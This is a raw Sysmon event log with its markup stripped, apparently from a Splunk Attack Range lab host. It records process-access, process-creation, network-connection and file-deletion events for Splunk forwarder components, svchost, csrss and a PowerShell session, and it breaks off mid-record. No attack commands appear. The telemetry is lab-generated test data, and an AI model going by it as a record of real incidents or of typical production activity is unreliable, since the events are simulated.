10341000x800000000000000036498102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.498{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.498{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.498{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A1A6-6140-9D56-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.498{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1A6-6140-9D56-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.483{B81B27B7-A1A6-6140-9D56-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.570{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50612-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.528{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67AFD40130D36CF92DC663AE5FA1AA08,SHA256=268D653C020EA74F081723C22A18A9D91A2AF652749C53CC0209A8AAC49C99DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.770{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50613-false10.0.1.12-8000- 10341000x800000000000000036498117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.166{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1A7-6140-9E56-04000000C801}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.166{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.166{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.166{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.166{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.166{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A1A7-6140-9E56-04000000C801}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.166{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1A7-6140-9E56-04000000C801}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.161{B81B27B7-A1A7-6140-9E56-04000000C801}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:40.596{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2116FAFA0F79D6A63520AC115165EA40,SHA256=59C03BCD3BBD592D26D8ED76AF47E66425E386F200C0FF1D4D4C4FBF4CC08281,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:40.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F343B174F2A7150354AE87BC1E8240B,SHA256=C04FECCDC1193E51A5216C044202FD88F0078E83FE66298B45ECE53C271E1ABA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:41.626{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=827A492134BADCF4DA12C41A7DCED24F,SHA256=5D8B23957EC07D2C88481C2F623B80E8029BDA9BC036DBED32039835F2241F47,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:42.640{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3543B672D63DFD0FE4AF76DCFB7BEAE,SHA256=AB7C8745613C030B1794C4E36E3A3A72FCC217188A1B9C01D07DEFFCA4477F44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:43.907{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CA56866389326C5003D3691468EB33A3,SHA256=CCFF8F1B901F5A29842895BDA9BE5629EFF5D4A457AD328F5D52F314102D2D3F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:43.656{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E05E63E76A8E675F6CFF75C97AC09EFD,SHA256=49554B4BB98CBC18EE687383E811ABE90161EFE2E14A6A0B3E69B582C1E78FA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:44.740{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2721DCB13593548CDF1277AE4ABA88D5,SHA256=06D31526F9D88D9698BD509606CD4A126DB8FDE974388D1B0D806389A40F54C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:14.580{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50614-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:45.757{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E6430BCE953B476FBA479801295D789,SHA256=8C79E0BF9A12EF83DC5CBCFC63A4944979119901861A70F3EB781ECDD4794AEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:14.764{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50615-false10.0.1.12-8000- 23542300x800000000000000036498130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:46.806{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21382FE8DBD50C3B39DF036EBD659B3C,SHA256=3330785047480D98643589241D40F3EEF987AEBE11E58908568821DF35A95AE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.977{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.937{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-A1AF-6140-9F56-04000000C801}61802616C:\Windows\system32\cmd.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.934{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating 